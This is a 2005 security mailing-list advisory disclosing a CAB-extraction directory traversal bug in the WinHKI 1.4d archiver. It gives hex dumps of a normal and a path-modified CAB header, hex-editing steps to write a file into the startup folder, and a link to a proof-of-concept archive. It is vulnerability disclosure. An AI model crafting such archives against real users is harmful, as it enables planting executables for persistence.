[VulnWatch] WinHKI - CAB File Directory Transversal

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/06/05

  • Next message: Rafel Ivgi, The-Insider: "[VulnWatch] WinAce & WinHKI - ZIP File Directory Transversal"
    Date: Thu, 06 Jan 2005 10:20:27 +0200
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, news@securiteam.com, "securitytracker.com" <bugs@securitytracker.com>
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: WinHKI
    Vendors: http://www.webtoolmaster.com
    Versions: 1.4d
    Platforms: Windows
    Bug: CAB File Directory Transversal
    Exploitation: Local (extract file)
    Date: 24 Dec 2004
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ
    compressions.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    This is a normal CAB compressed file header

    00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
    00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
    00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
    00000030 0000 0000 0000 0C2F CC61 2000 7356 5656 ......./.a .sVVV
    00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
    00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
    00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o

    in the following code, we can see how easy it is to change the path
    to anywhere we want, including the all users start up folder.

    00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
    00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
    00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
    00000030 0000 0000 0000 0C2F CC61 2000 433A 5C56 ......./.a .C:\V
    00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
    00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
    00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o

    All we need to do is cab compress (using Microsoft's "makecab" or Winace)
    a file with a long name/path and change the path specified inside the file
    to whatever we want Using any Hex editor such as HexWorkshop, just add
    anything to the filename.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    An online proof of concept can be found at:
    http://theinsider.web1000.com/hki transversal.cab

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Scripts and Codes will make me D.O.S , but they will never HACK me."
    

  • Next message: Rafel Ivgi, The-Insider: "[VulnWatch] WinAce & WinHKI - ZIP File Directory Transversal"